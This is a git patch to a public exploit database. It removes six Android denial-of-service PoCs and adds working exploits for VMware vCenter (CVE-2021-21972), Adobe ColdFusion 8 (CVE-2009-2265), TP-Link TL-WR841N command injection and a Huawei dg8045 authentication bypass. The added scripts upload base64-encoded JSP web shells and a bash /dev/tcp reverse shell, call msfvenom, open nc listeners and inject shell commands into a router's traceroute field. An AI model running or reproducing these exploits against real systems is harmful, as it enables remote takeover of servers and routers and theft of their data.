From 135e56dda88aa004b0a022533ede8e4d7e4d3264 Mon Sep 17 00:00:00 2001 From: Offensive Security Date: Fri, 25 Jun 2021 05:01:52 +0000 Subject: [PATCH] DB: 2021-06-25 16 changes to exploits/shellcodes BasicNote 1.1.9 - Denial of Service (PoC) ColorNote 4.1.9 - Denial of Service (PoC) Notepad notes 2.6.7 - Denial of Service (PoC) Blacknote 2.2.1 - Denial of Service (PoC) Inkpad Notepad & To do list 4.3.61 - Denial of Service (PoC) GeoGebra 3D Calculator 5.0.511.0 - Denial of Service (PoC) VMware vCenter Server RCE 6.5 / 6.7 / 7.0 - Remote Code Execution (RCE) (Unauthenticated) Adobe ColdFusion 8 - Remote Command Execution (RCE) TP-Link TL-WR841N - Command Injection Huawei dg8045 - Authentication Bypass --- exploits/android/dos/49938.py | 35 -------- exploits/android/dos/49939.py | 37 --------- exploits/android/dos/49940.py | 35 -------- exploits/android/dos/49941.py | 35 -------- exploits/android/dos/49946.txt | 35 -------- exploits/android/local/49656.py | 28 ------- exploits/cfm/webapps/50057.py | 121 ++++++++++++++++++++++++++++ exploits/hardware/webapps/50058.py | 75 +++++++++++++++++ exploits/hardware/webapps/50059.txt | 45 +++++++++++ exploits/multiple/webapps/50056.py | 117 +++++++++++++++++++++++++++ files_exploits.csv | 10 +-- 11 files changed, 362 insertions(+), 211 deletions(-) delete mode 100755 exploits/android/dos/49938.py delete mode 100755 exploits/android/dos/49939.py delete mode 100755 exploits/android/dos/49940.py delete mode 100755 exploits/android/dos/49941.py delete mode 100644 exploits/android/dos/49946.txt delete mode 100755 exploits/android/local/49656.py create mode 100755 exploits/cfm/webapps/50057.py create mode 100755 exploits/hardware/webapps/50058.py create mode 100644 exploits/hardware/webapps/50059.txt create mode 100755 exploits/multiple/webapps/50056.py diff --git a/exploits/android/dos/49938.py b/exploits/android/dos/49938.py deleted file mode 100755 index 7e96e468d..000000000 --- a/exploits/android/dos/49938.py +++ /dev/null @@ -1,35 +0,0 @@ -# Exploit Title: BasicNote 1.1.9 - Denial of Service (PoC) -# Date: 2021-06-02 -# Author: Brian Rodríguez -# Download Link: https://play.google.com/store/apps/details?id=notizen.basic.notes.notas.note.notepad&hl=es_MX -# Version: 1.1.9 -# Category: DoS (Android) - -##### Vulnerability ##### - -BasicNote - Notas, Bloc de notas is vulnerable to a DoS condition when two long lists of characters are being used when creating a note: - -# STEPS # -# Open the program -# Create a new Note. -# Run the python exploit script payload.py, it will create a new payload.txt file -# Copy the content of the file "payload.txt" -# Paste the content from payload.txt twice in the new Note. -# Crashed - -Successful exploitation will causes application stop working. - -I have been able to test this exploit against Android 8.0. - -##### PoC ##### - -#!/usr/bin/env python -buffer = "\x41" * 350000 - -try: - f = open("payload.txt","w") - f.write(buffer) - f.close() - print ("File created") -except: - print ("File cannot be created") \ No newline at end of file diff --git a/exploits/android/dos/49939.py b/exploits/android/dos/49939.py deleted file mode 100755 index a7a0a1582..000000000 --- a/exploits/android/dos/49939.py +++ /dev/null @@ -1,37 +0,0 @@ -# Exploit Title: ColorNote 4.1.9 - Denial of Service (PoC) -# Date: 2021-06-02 -# Author: Brian Rodríguez -# Download Link: https://play.google.com/store/apps/details?id=com.socialnmobile.dictapps.notepad.color.note&hl=es_MX -# Version: 4.1.9 -# Category: DoS (Android) - -##### Vulnerability ##### - -Color Note is vulnerable to a DoS condition when a long list of characters is being used. - -# STEPS # -# Open the program -# Create a new Note. -# Run the python exploit script payload.py, it will create a new payload.txt file -# Copy the content of the file "payload.txt" -# Paste the content from payload.txt in the new note. -# Click the "Return" button twice. -# Start clicking the screen. -# Crashed - -Successful exploitation will causes application stop working. - -I have been able to test this exploit against Android 8.0. - -##### PoC ##### ---> payload.py <-- -#!/usr/bin/env python -buffer = "\x41" * 350000 - -try: - f = open("payload.txt","w") - f.write(buffer) - f.close() - print ("File created") -except: - print ("File cannot be created") \ No newline at end of file diff --git a/exploits/android/dos/49940.py b/exploits/android/dos/49940.py deleted file mode 100755 index 91566e8a4..000000000 --- a/exploits/android/dos/49940.py +++ /dev/null @@ -1,35 +0,0 @@ -# Exploit Title: Notepad notes 2.6.7 - Denial of Service (PoC) -# Date: 2021-06-02 -# Author: Brian Rodríguez -# Download Link: https://play.google.com/store/apps/details?id=com.hlcsdev.x.notepad&hl=es_MX -# Version: 2.6.7 -# Category: DoS (Android) - -##### Vulnerability ##### - -Bloc de notas is vulnerable to a DoS condition when a long lists of characters is being used when creating a note: - -# STEPS # -# Open the program. -# Create a new Note. -# Run the python exploit script payload.py, it will create a new payload.txt file -# Copy the content of the file "payload.txt" -# Paste the content from payload.txt twice in the new Note. -# Crashed - -Successful exploitation will cause application to stop working. - -I have been able to test this exploit against Android 8.0. - -##### PoC ##### ---> payload.py <-- -#!/usr/bin/env python -buffer = "\x41" * 350000 - -try: - f = open("payload.txt","w") - f.write(buffer) - f.close() - print ("File created") -except: - print ("File cannot be created") \ No newline at end of file diff --git a/exploits/android/dos/49941.py b/exploits/android/dos/49941.py deleted file mode 100755 index cee03c492..000000000 --- a/exploits/android/dos/49941.py +++ /dev/null @@ -1,35 +0,0 @@ -# Exploit Title: Blacknote 2.2.1 - Denial of Service (PoC) -# Date: 2021-06-02 -# Author: Brian Rodríguez -# Download Link: https://play.google.com/store/apps/details?id=notepad.note.notas.notes.notizen&hl=es_MX -# Version: 2.2.1 -# Category: DoS (Android) - -##### Vulnerability ##### - -BlackNote Bloc de notas is vulnerable to a DoS condition when a long list of characters is being used when creating a note: - -# STEPS # -# Open the program. -# Create a new Note. -# Run the python exploit script payload.py, it will create a new payload.txt file -# Copy the content of the file "payload.txt" -# Paste the content from payload.txt twice in the new Note. -# Crashed - -Successful exploitation will cause the application to stop working. - -I have been able to test this exploit against Android 8.0. - -##### PoC ##### ---> payload.py <-- -#!/usr/bin/env python -buffer = "\x41" * 350000 - -try: - f = open("payload.txt","w") - f.write(buffer) - f.close() - print ("File created") -except: - print ("File cannot be created") \ No newline at end of file diff --git a/exploits/android/dos/49946.txt b/exploits/android/dos/49946.txt deleted file mode 100644 index 6434b7f5c..000000000 --- a/exploits/android/dos/49946.txt +++ /dev/null @@ -1,35 +0,0 @@ -# Exploit Title: Inkpad Notepad & To do list 4.3.61 - Denial of Service (PoC) -# Date: 2021-06-03 -# Author: Brian Rodríguez -# Download Link: https://play.google.com/store/apps/details?id=com.workpail.inkpad.notepad.notes&hl=es_MX -# Version: 4.3.61 -# Category: DoS (Android) - -##### Vulnerability ##### - -InkPad Bloc de notas - Tareas is vulnerable to a DoS condition when a long list of characters is being used when creating a note: - -# STEPS # -# Open the program. -# Create a new Note. -# Run the python exploit script payload.py, it will create a new payload.txt file -# Copy the content of the file "payload.txt" -# Paste the content from payload.txt twice in the new Note. -# Crashed - -Successful exploitation will cause the application to stop working. - -I have been able to test this exploit against Android 8.0. - -##### PoC ##### ---> payload.py <-- -#!/usr/bin/env python -buffer = "\x41" * 50000 - -try: - f = open("payload.txt","w") - f.write(buffer) - f.close() - print ("File created") -except: - print ("File cannot be created") \ No newline at end of file diff --git a/exploits/android/local/49656.py b/exploits/android/local/49656.py deleted file mode 100755 index fec83844d..000000000 --- a/exploits/android/local/49656.py +++ /dev/null @@ -1,28 +0,0 @@ -# Exploit Title: GeoGebra 3D Calculator 5.0.511.0 - Denial of Service (PoC) -# Date: 2021-03-15 -# Author: Brian Rodríguez -# Software Site: https://www.geogebra.org/download -# Download Link: https://play.google.com/store/apps/details?id=org.geogebra.android.g3d&utm_source=Download+page&utm_medium=Website&utm_campaign=3D+Calculator+for+Android -# Version: 5.0.511.0 -# Category: DoS (Android) - -##### Vulnerability ##### - -Graficador GeoGebra 3D is vulnerable to a DoS condition when a long list of characters is being used in field "Entrada..." text box. - -Successful exploitation will causes application stop working. - -I have been able to test this exploit against Android 10.0. - -##### PoC ##### - -#!/usr/bin/env python -buffer = "\x41" * 8000 - -try: - f = open("payload.txt","w") - f.write(buffer) - f.close() - print ("File created") -except: - print ("File cannot be created") \ No newline at end of file diff --git a/exploits/cfm/webapps/50057.py b/exploits/cfm/webapps/50057.py new file mode 100755 index 000000000..4f1d42b08 --- /dev/null +++ b/exploits/cfm/webapps/50057.py @@ -0,0 +1,121 @@ +# Exploit Title: Adobe ColdFusion 8 - Remote Command Execution (RCE) +# Google Dork: intext:"adobe coldfusion 8" +# Date: 24/06/2021 +# Exploit Author: Pergyz +# Vendor Homepage: https://www.adobe.com/sea/products/coldfusion-family.html +# Version: 8 +# Tested on: Microsoft Windows Server 2008 R2 Standard +# CVE : CVE-2009-2265 + +#!/usr/bin/python3 + +from multiprocessing import Process +import io +import mimetypes +import os +import urllib.request +import uuid + +class MultiPartForm: + + def __init__(self): + self.files = [] + self.boundary = uuid.uuid4().hex.encode('utf-8') + return + + def get_content_type(self): + return 'multipart/form-data; boundary={}'.format(self.boundary.decode('utf-8')) + + def add_file(self, fieldname, filename, fileHandle, mimetype=None): + body = fileHandle.read() + + if mimetype is None: + mimetype = (mimetypes.guess_type(filename)[0] or 'application/octet-stream') + + self.files.append((fieldname, filename, mimetype, body)) + return + + @staticmethod + def _attached_file(name, filename): + return (f'Content-Disposition: form-data; name="{name}"; filename="{filename}"\r\n').encode('utf-8') + + @staticmethod + def _content_type(ct): + return 'Content-Type: {}\r\n'.format(ct).encode('utf-8') + + def __bytes__(self): + buffer = io.BytesIO() + boundary = b'--' + self.boundary + b'\r\n' + + for f_name, filename, f_content_type, body in self.files: + buffer.write(boundary) + buffer.write(self._attached_file(f_name, filename)) + buffer.write(self._content_type(f_content_type)) + buffer.write(b'\r\n') + buffer.write(body) + buffer.write(b'\r\n') + + buffer.write(b'--' + self.boundary + b'--\r\n') + return buffer.getvalue() + +def execute_payload(): + print('\nExecuting the payload...') + print(urllib.request.urlopen(f'http://{rhost}:{rport}/userfiles/file/{filename}.jsp').read().decode('utf-8')) + +def listen_connection(): + print('\nListening for connection...') + os.system(f'nc -nlvp {lport}') + +if __name__ == '__main__': + # Define some information + lhost = '10.10.16.4' + lport = 4444 + rhost = "10.10.10.11" + rport = 8500 + filename = uuid.uuid4().hex + + # Generate a payload that connects back and spawns a command shell + print("\nGenerating a payload...") + os.system(f'msfvenom -p java/jsp_shell_reverse_tcp LHOST={lhost} LPORT={lport} -o {filename}.jsp') + + # Encode the form data + form = MultiPartForm() + form.add_file('newfile', filename + '.txt', fileHandle=open(filename + '.jsp', 'rb')) + data = bytes(form) + + # Create a request + request = urllib.request.Request(f'http://{rhost}:{rport}/CFIDE/scripts/ajax/FCKeditor/editor/filemanager/connectors/cfm/upload.cfm?Command=FileUpload&Type=File&CurrentFolder=/{filename}.jsp%00', data=data) + request.add_header('Content-type', form.get_content_type()) + request.add_header('Content-length', len(data)) + + # Print the request + print('\nPriting request...') + + for name, value in request.header_items(): + print(f'{name}: {value}') + + print('\n' + request.data.decode('utf-8')) + + # Send the request and print the response + print('\nSending request and printing response...') + print(urllib.request.urlopen(request).read().decode('utf-8')) + + # Print some information + print('\nPrinting some information for debugging...') + print(f'lhost: {lhost}') + print(f'lport: {lport}') + print(f'rhost: {rhost}') + print(f'rport: {rport}') + print(f'payload: {filename}.jsp') + + # Delete the payload + print("\nDeleting the payload...") + os.system(f'rm {filename}.jsp') + + # Listen for connections and execute the payload + p1 = Process(target=listen_connection) + p1.start() + p2 = Process(target=execute_payload) + p2.start() + p1.join() + p2.join() \ No newline at end of file diff --git a/exploits/hardware/webapps/50058.py b/exploits/hardware/webapps/50058.py new file mode 100755 index 000000000..f32b5ba2d --- /dev/null +++ b/exploits/hardware/webapps/50058.py @@ -0,0 +1,75 @@ +# Exploit Title: TP-Link TL-WR841N - Command Injection +# Date: 2020-12-13 +# Exploit Author: Koh You Liang +# Vendor Homepage: https://www.tp-link.com/ +# Software Link: https://static.tp-link.com/TL-WR841N(JP)_V13_161028.zip +# Version: TL-WR841N 0.9.1 4.0 +# Tested on: Windows 10 +# CVE : CVE-2020-35575 + +import requests +import sys +import time + +try: + _ = sys.argv[2] + payload = ' '.join(sys.argv[1:]) +except IndexError: + try: + payload = sys.argv[1] + except IndexError: + print("[*] Command not specified, using the default `cat etc/passwd=`") + payload = 'cat etc/passwd' + +# Default credentials is admin:admin - replace with your own +cookies = { + 'Authorization': 'Basic YWRtaW46YWRtaW4=' +} + +headers = { + 'Host': '192.168.0.1', + 'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:84.0) Gecko=/20100101 Firefox/84.0', + 'Accept': '*/*', + 'Accept-Language': 'en-US,en;q=0.5', + 'Accept-Encoding': 'gzip, deflate', + 'Content-Type': 'text/plain', + 'Content-Length': '197', + 'Origin': 'http://192.168.0.1', + 'Connection': 'close', + 'Referer': 'http://192.168.0.1/mainFrame.htm', +} + +data1 = \ +'''[TRACEROUTE_DIAG#0,0,0,0,0,0#0,0,0,0,0,0]0,8\r\nmaxHopCount=20\r\ntimeout=50\r\nnumberOfTries=1\r\nhost="`{}`"\r\ndataBlockSize=64\r\nX_TP_ConnName=ewan_ipoe_d\r\ndiagnosticsState=Requested\r\nX_TP_HopSeq=0\r\n'''.format(payload) +response1 = requests.post('http://192.168.0.1/cgi?2', headers=headers, cookies=cookies, data=data1, verify=False) +print('[+] Sending payload...') + +try: + response1.text.splitlines()[0] +except IndexError: + sys.exit('[-] Cannot get response. Please check your cookie.') +if response1.text.splitlines()[0] != '[error]0': + sys.exit('[*] Router/Firmware is not vulnerable.') + +data2 = '[ACT_OP_TRACERT#0,0,0,0,0,0#0,0,0,0,0,0]0,0\r\n' +response2 = requests.post('http://192.168.0.1/cgi?7', headers=headers, cookies=cookies, data=data2, verify=False) +print('[+] Receiving response from router...') +time.sleep(0.8) # Buffer time for traceroute to succeed + +data3 = '''[TRACEROUTE_DIAG#0,0,0,0,0,0#0,0,0,0,0,0]0,3\r\ndiagnosticsState\r\nX_TP_HopSeq\r\nX_TP_Result\r\n''' +response3 = requests.post('http://192.168.0.1/cgi?1', headers=headers, cookies=cookies, data=data3, verify=False) + +if '=:' in response3.text.splitlines()[3]: + print('[-] Command not supported.') +else: + print('[+] Exploit successful!') + for line_number, line in enumerate(response3.text.splitlines()): + try: + if line_number == 3: + print(line[12:]) + if line_number > 3 and line != '[error]0': + print(line) + if 'not known' in line: + break + except IndexError: + break \ No newline at end of file diff --git a/exploits/hardware/webapps/50059.txt b/exploits/hardware/webapps/50059.txt new file mode 100644 index 000000000..7bf8bb178 --- /dev/null +++ b/exploits/hardware/webapps/50059.txt @@ -0,0 +1,45 @@ +# Title: Huawei dg8045 - Authentication Bypass +# Date: 2020-06-24 +# Author: Abdalrahman Gamal +# Vendor Homepage: www.huawei.com +# Version: dg8045 +# Hardware Version: VER.A + +#POC: + +The default password of this router is the last 8 characters of the +device's serial number which exist in the back of the device. + +An attacker can leak the serial number via the web app API like the +following: + +************************Request************************ +GET /api/system/deviceinfo HTTP/1.1 +Host: 192.168.1.1 +User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:65.0) +Gecko/20100101 Firefox/65.0 +Accept: application/json, text/javascript, */*; q=0.01 +Accept-Language: en-US,en;q=0.5 +Accept-Encoding: gzip, deflate +Referer: https://192.168.1.1/ +X-Requested-With: XMLHttpRequest +Connection: close + + +************************Response************************ +HTTP/1.1 200 OK +Cache-Control: no-cache, no-store, max-age=0, must-revalidate +X-Download-Options: noopen +X-Frame-Options: SAMEORIGIN +X-XSS-Protection: 1; mode=block +Date: Thu, 24 Jun 2021 02:07 GMT+2 +Connection: Keep-Alive +Content-Language: en +Content-Type: application/javascript +Content-Length: 141 + +while(1); /*{"DeviceName":"DG8045","SerialNumber":"21530369847SK9252081","ManufacturerOUI":"00E0FC","UpTime":81590,"HardwareVersion":"VER.A"}*/ + + + +You can use that serial number last 8 char/digits to login to the router. \ No newline at end of file diff --git a/exploits/multiple/webapps/50056.py b/exploits/multiple/webapps/50056.py new file mode 100755 index 000000000..c7cd36259 --- /dev/null +++ b/exploits/multiple/webapps/50056.py @@ -0,0 +1,117 @@ +# Exploit Title: VMware vCenter Server RCE 6.5 / 6.7 / 7.0 - Remote Code Execution (RCE) (Unauthenticated) +# Date: 06/21/2021 +# Exploit Author: CHackA0101 +# Vendor Homepage: https://kb.vmware.com/s/article/82374 +# Software Link: https://www.vmware.com/products/vcenter-server.html +# Version: This affects VMware vCenter Server (7.x before 7.0 U1c, 6.7 before 6.7 U3l and 6.5 before 6.5 U3n) and VMware Cloud Foundation (4.x before 4.2 and 3.x before 3.10.1.2). +# Tested on: VMware vCenter version 6.5 (OS: Linux 4.4.182-1.ph1 SMP UTC 2019 x86_64 GNU/Linux) +# CVE: 2021-21972 + +# More Info: https://github.com/chacka0101/exploits/blob/master/CVE-2021-21972/README.md + +#!/usr/bin/python2 + +import os +import urllib3 +import argparse +import sys +import requests +import base64 +import tarfile +import threading +import time + +urllib3.disable_warnings(urllib3.exceptions.InsecureRequestWarning) + +myargs=argparse.ArgumentParser() +myargs.add_argument('-T','--target',help='The IP address of the target',required=True) +myargs.add_argument('-L','--local',help='Your local IP',required=True) +args=myargs.parse_args() + +def getprompt(x): + print ("(CHackA0101-GNU/Linux)$ "+ str(x)) + +def getpath(path="/usr/lib/vmware-vsphere-ui/server/work/deployer/s/global/37/0/h5ngc.war/resources/shell4.jsp"): + fullpath="../" * 7 + path + return fullpath.replace('\\','/').replace('//','/') + +def createbackdoor(localip): + # shell4.jsp + backdoor = "PGZvcm0gbWV0aG9kPSJHRVQiIGFjdGlvbj0iIj4KCTxpbnB1dCB0eXBlPSJ0ZXh0IiBuYW1lPSJjbWQiIC8+Cgk8aW5wdXQgdHlwZT0ic3VibWl0IiB2YWx1ZT0iRXhlYyEiIC8+CjwvZm9ybT4gPCUhCnB1YmxpYyBTdHJpbmcgZXNjKFN0cmluZyBzdHIpewoJU3RyaW5nQnVmZmVyIHNiID0gbmV3IFN0cmluZ0J1ZmZlcigpOwoJZm9yKGNoYXIgYyA6IHN0ci50b0NoYXJBcnJheSgpKQoJCWlmKCBjID49ICcwJyAmJiBjIDw9ICc5JyB8fCBjID49ICdBJyAmJiBjIDw9ICdaJyB8fCBjID49ICdhJyAmJiBjIDw9ICd6JyB8fCBjID09ICcgJyApCgkJCXNiLmFwcGVuZCggYyApOwoJCWVsc2UKCQkJc2IuYXBwZW5kKCImIyIrKGludCkoYyYweGZmKSsiOyIpOwoJcmV0dXJuIHNiLnRvU3RyaW5nKCk7Cn0gJT48JQpTdHJpbmcgY21kID0gcmVxdWVzdC5nZXRQYXJhbWV0ZXIoImNtZCIpOwppZiAoIGNtZCAhPSBudWxsKSB7CglvdXQucHJpbnRsbigiPHByZT5Db21tYW5kIHdhczogPGI+Iitlc2MoY21kKSsiPC9iPlxuIik7CglqYXZhLmlvLkRhdGFJbnB1dFN0cmVhbSBpbiA9IG5ldyBqYXZhLmlvLkRhdGFJbnB1dFN0cmVhbShSdW50aW1lLmdldFJ1bnRpbWUoKS5leGVjKGNtZCkuZ2V0SW5wdXRTdHJlYW0oKSk7CglTdHJpbmcgbGluZSA9IGluLnJlYWRMaW5lKCk7Cgl3aGlsZSggbGluZSAhPSBudWxsICl7CgkJb3V0LnByaW50bG4oZXNjKGxpbmUpKTsKCQlsaW5lID0gaW4ucmVhZExpbmUoKTsKCX0KCW91dC5wcmludGxuKCI8L3ByZT4iKTsKfSAlPg==" + backdoor = base64.b64decode(backdoor).decode('utf-8') + f = open("shell4.jsp","w") + f.write(backdoor) + f.close() + # reverse.sh + # After decoding overwrite string 'CUSTOM_IP' for local IP + shell="IyEvYmluL2Jhc2gKYmFzaCAtaSA+JiAvZGV2L3RjcC9DVVNUT01fSVAvNDQzIDA+JjE=" + shell=base64.b64decode(shell).decode('utf-8') + shell=shell.replace('CUSTOM_IP',localip) + f=open("reverse.sh","w") + f.write(shell) + f.close() + # Move on with the payload + payload_file=tarfile.open('payload.tar','w') + myroute=getpath() + getprompt('Adding web backdoor to archive') + payload_file.add("shell4.jsp", myroute) + myroute=getpath("tmp/reverse.sh") + getprompt('Adding bash backdoor to archive') + payload_file.add("reverse.sh", myroute) + payload_file.close() + # cleaning up a little bit + os.unlink("reverse.sh") + os.unlink("shell4.jsp") + getprompt('Backdoor file just was created.') + +def launchexploit(ip): + res=requests.post('https://' + ip + '/ui/vropspluginui/rest/services/uploadova', files={'uploadFile':open('payload.tar', 'rb')}, verify=False, timeout=60) + if res.status_code == 200 and res.text == 'SUCCESS': + getprompt('Backdoor was uploaded successfully!') + return True + else: + getprompt('Backdoor failed to be uploaded. Target denied access.') + return False + +def testshell(ip): + getprompt('Looking for shell...') + shell_path="/ui/resources/shell4.jsp?cmd=uname+-a" + res=requests.get('https://' + ip + shell_path, verify=False, timeout=60) + if res.status_code==200: + getprompt('Shell was found!.') + response=res.text + if True: + getprompt('Shell is responsive.') + try: + response=re.findall("b>(.+)uname -a') + print(response) + except: + pass + return True + else: + getprompt('Sorry. Shell was not found.') + return False + +def opendoor(url): + time.sleep(3) + getprompt('Executing command.') + requests.get(url, verify=False, timeout=1800) + +def executebackdoor(ip, localip): + url="https://"+ip+"/ui/resources/shell4.jsp?cmd=bash%20/tmp/reverse.sh" + t=threading.Thread(target=opendoor,args=(url,)) + t.start() + getprompt('Setting up socket '+localip+':443') + os.system('nc -lnvp 443') + +if len(sys.argv)== 1: + myargs.print_help(sys.stderr) + sys.exit(1) +createbackdoor(args.local) +uploaded=launchexploit(args.target) +if uploaded: + tested=testshell(args.target) + if tested: + executebackdoor(args.target, args.local) +getprompt("Execution completed!") \ No newline at end of file diff --git a/files_exploits.csv b/files_exploits.csv index 6ea794266..573fefb55 100644 --- a/files_exploits.csv +++ b/files_exploits.csv @@ -6785,11 +6785,6 @@ id,file,description,date,author,type,platform,port 49898,exploits/windows/dos/49898.txt,"iDailyDiary 4.30 - Denial of Service (PoC)",2021-05-24,"Ismael Nava",dos,windows, 49906,exploits/windows/dos/49906.py,"RarmaRadio 2.72.8 - Denial of Service (PoC)",2021-05-26,"Ismael Nava",dos,windows, 49917,exploits/windows/dos/49917.py,"DupTerminator 1.4.5639.37199 - Denial of Service (PoC)",2021-06-01,"Brian Rodriguez",dos,windows, -49938,exploits/android/dos/49938.py,"BasicNote 1.1.9 - Denial of Service (PoC)",2021-06-03,"Brian Rodriguez",dos,android, -49939,exploits/android/dos/49939.py,"ColorNote 4.1.9 - Denial of Service (PoC)",2021-06-03,"Brian Rodriguez",dos,android, -49940,exploits/android/dos/49940.py,"Notepad notes 2.6.7 - Denial of Service (PoC)",2021-06-03,"Brian Rodriguez",dos,android, -49941,exploits/android/dos/49941.py,"Blacknote 2.2.1 - Denial of Service (PoC)",2021-06-03,"Brian Rodriguez",dos,android, -49946,exploits/android/dos/49946.txt,"Inkpad Notepad & To do list 4.3.61 - Denial of Service (PoC)",2021-06-04,"Brian Rodriguez",dos,android, 49952,exploits/ios/dos/49952.py,"Color Notes 1.4 - Denial of Service (PoC)",2021-06-04,"Geovanni Ruiz",dos,ios, 49953,exploits/ios/dos/49953.py,"Macaron Notes great notebook 5.5 - Denial of Service (PoC)",2021-06-04,"Geovanni Ruiz",dos,ios, 49954,exploits/ios/dos/49954.py,"My Notes Safe 5.3 - Denial of Service (PoC)",2021-06-04,"Geovanni Ruiz",dos,ios, @@ -11316,7 +11311,6 @@ id,file,description,date,author,type,platform,port 49653,exploits/windows/local/49653.py,"GeoGebra Graphing Calculato‪r‬ 6.0.631.0 - Denial Of Service (PoC)",2021-03-16,"Brian Rodriguez",local,windows, 49654,exploits/windows/local/49654.py,"GeoGebra Classic 5.0.631.0-d - Denial of Service (PoC)",2021-03-16,"Brian Rodriguez",local,windows, 49655,exploits/windows/local/49655.py,"GeoGebra CAS Calculato‪r‬ 6.0.631.0 - Denial of Service (PoC)",2021-03-16,"Brian Rodriguez",local,windows, -49656,exploits/android/local/49656.py,"GeoGebra 3D Calculator 5.0.511.0 - Denial of Service (PoC)",2021-03-16,"Brian Rodriguez",local,android, 49660,exploits/windows/local/49660.py,"FastStone Image Viewer 7.5 - .cur BITMAPINFOHEADER 'BitCount' Stack Based Buffer Overflow (ASLR & DEP Bypass)",2021-03-17,"Paolo Stagno",local,windows, 49661,exploits/windows/local/49661.txt,"VFS for Git 1.0.21014.1 - 'GVFS.Service' Unquoted Service Path",2021-03-18,"Mohammed Alshehri",local,windows, 49671,exploits/windows/local/49671.txt,"BRAdmin Professional 3.75 - 'BRA_Scheduler' Unquoted Service Path",2021-03-19,"Metin Yunus Kandemir",local,windows, @@ -44203,3 +44197,7 @@ id,file,description,date,author,type,platform,port 50053,exploits/php/webapps/50053.txt,"Online Library Management System 1.0 - 'Search' SQL Injection",2021-06-23,"Berk Can Geyikci",webapps,php, 50054,exploits/php/webapps/50054.py,"Online Library Management System 1.0 - Arbitrary File Upload Remote Code Execution (Unauthenticated)",2021-06-23,"Berk Can Geyikci",webapps,php, 50055,exploits/php/webapps/50055.txt,"Simple CRM 3.0 - 'email' SQL injection (Authentication Bypass)",2021-06-23,"Rinku Kumar",webapps,php, +50056,exploits/multiple/webapps/50056.py,"VMware vCenter Server RCE 6.5 / 6.7 / 7.0 - Remote Code Execution (RCE) (Unauthenticated)",2021-06-24,CHackA0101,webapps,multiple, +50057,exploits/cfm/webapps/50057.py,"Adobe ColdFusion 8 - Remote Command Execution (RCE)",2021-06-24,Pergyz,webapps,cfm, +50058,exploits/hardware/webapps/50058.py,"TP-Link TL-WR841N - Command Injection",2021-06-24,"Koh You Liang",webapps,hardware, +50059,exploits/hardware/webapps/50059.txt,"Huawei dg8045 - Authentication Bypass",2021-06-24,"Abdalrahman Gamal",webapps,hardware,